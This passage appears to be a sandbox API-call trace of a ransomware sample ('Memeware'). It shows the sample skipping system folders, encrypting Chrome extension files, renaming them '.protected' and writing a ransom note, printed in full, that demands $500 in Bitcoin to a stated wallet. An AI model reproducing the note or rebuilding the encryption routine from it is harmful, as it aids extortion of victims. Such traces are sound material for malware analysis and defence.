nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.360] lstrlenA (lpString="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") returned 684 [0081.360] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.360] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.360] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0081.360] CloseHandle (hObject=0x164) returned 1 [0081.361] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.361] lstrcmpiW (lpString1="cs", lpString2="Windows") returned -1 [0081.361] lstrcmpiW (lpString1="cs", lpString2="Program Files") returned -1 [0081.361] lstrcmpiW (lpString1="cs", lpString2="Program Files (x86)") returned -1 [0081.361] lstrcmpiW (lpString1="cs", lpString2="$Recycle.bin") returned 1 [0081.361] lstrcmpiW (lpString1="cs", lpString2="System Volume Information") returned -1 [0081.361] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs") returned 141 [0081.361] lstrcmpW (lpString1="cs", lpString2=".") returned 1 [0081.361] lstrcmpW (lpString1="cs", lpString2="..") returned 1 [0081.361] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\*") returned 143 [0081.361] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.362] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.362] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.362] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.362] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.362] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.362] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" 
| out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\.") returned 143 [0081.362] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.362] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.362] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.362] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.362] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.362] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.362] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.362] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\..") returned 144 [0081.362] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.362] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.362] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.362] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.362] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.362] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.362] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.363] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.363] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json") 
returned 155 [0081.363] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.363] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.363] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.363] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.363] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.364] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json") returned 155 [0081.364] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.364] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json") returned 155 [0081.364] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.364] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json") returned 155 [0081.364] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.364] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xf9, lpOverlapped=0x0) returned 1 [0081.365] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff07, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.365] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xf9, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xf9, lpOverlapped=0x0) returned 1 [0081.365] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.365] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.366] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.366] CloseHandle (hObject=0x168) returned 1 [0081.366] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json.protected") returned 165 [0081.366] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json.protected")) returned 1 [0081.367] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.367] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.367] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\RESTORE_FILES.txt") returned 159 [0081.367] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.367] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.367] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.368] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.368] WriteFile (in: hFile=0x164, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.368] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.368] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.368] CloseHandle (hObject=0x164) returned 1 [0081.368] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.368] lstrcmpiW (lpString1="da", lpString2="Windows") returned -1 [0081.368] lstrcmpiW (lpString1="da", lpString2="Program Files") returned -1 [0081.369] lstrcmpiW (lpString1="da", lpString2="Program Files (x86)") returned -1 [0081.369] lstrcmpiW (lpString1="da", lpString2="$Recycle.bin") returned 1 [0081.369] lstrcmpiW (lpString1="da", lpString2="System Volume Information") returned -1 [0081.369] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da") returned 141 [0081.369] lstrcmpW (lpString1="da", lpString2=".") returned 1 [0081.369] lstrcmpW (lpString1="da", lpString2="..") returned 1 [0081.369] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\*") returned 143 [0081.369] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.370] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.370] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.370] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.370] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.370] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.370] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\.") returned 143 [0081.370] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.370] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.370] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.370] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.370] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.370] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.370] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.370] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\..") returned 144 [0081.370] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.370] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.370] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.370] lstrcmpiW 
(lpString1="messages.json", lpString2="Windows") returned -1 [0081.370] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.370] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.370] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.370] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.370] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json") returned 155 [0081.370] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.370] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.370] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.370] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.370] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.372] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json") returned 155 [0081.372] StrStrW 
(lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.372] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json") returned 155 [0081.372] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.372] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json") returned 155 [0081.372] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.372] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xec, lpOverlapped=0x0) returned 1 [0081.373] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff14, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.373] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xec, lpOverlapped=0x0) returned 1 [0081.373] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.373] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.373] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.373] CloseHandle (hObject=0x168) returned 1 [0081.373] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, 
pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json.protected") returned 165 [0081.373] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json.protected")) returned 1 [0081.374] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.374] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.374] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\RESTORE_FILES.txt") returned 159 [0081.374] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.375] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.375] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.376] lstrlenA (lpString="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") returned 684 [0081.376] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, 
lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.376] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.376] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.376] CloseHandle (hObject=0x164) returned 1 [0081.376] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.376] lstrcmpiW (lpString1="de", lpString2="Windows") returned -1 [0081.376] lstrcmpiW (lpString1="de", lpString2="Program Files") returned -1 [0081.376] lstrcmpiW (lpString1="de", lpString2="Program Files (x86)") returned -1 [0081.376] lstrcmpiW (lpString1="de", lpString2="$Recycle.bin") returned 1 [0081.376] lstrcmpiW (lpString1="de", lpString2="System Volume Information") returned -1 [0081.376] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de") returned 